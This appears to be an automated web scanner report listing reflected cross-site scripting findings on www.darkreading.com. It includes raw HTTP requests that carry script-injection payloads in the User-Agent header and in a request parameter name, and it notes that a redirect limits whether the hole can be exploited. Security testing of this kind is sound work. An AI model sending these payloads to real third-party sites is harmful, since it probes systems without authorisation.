GET / HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10268a9"-alert(1)-"3c9be397fb2 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.1027. http://www.darkreading.com/ [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91b95"><script>alert(1)</script>1552d2f02a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?91b95"><script>alert(1)</script>1552d2f02a5=1 HTTP/1.1 Host: www.darkreading.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3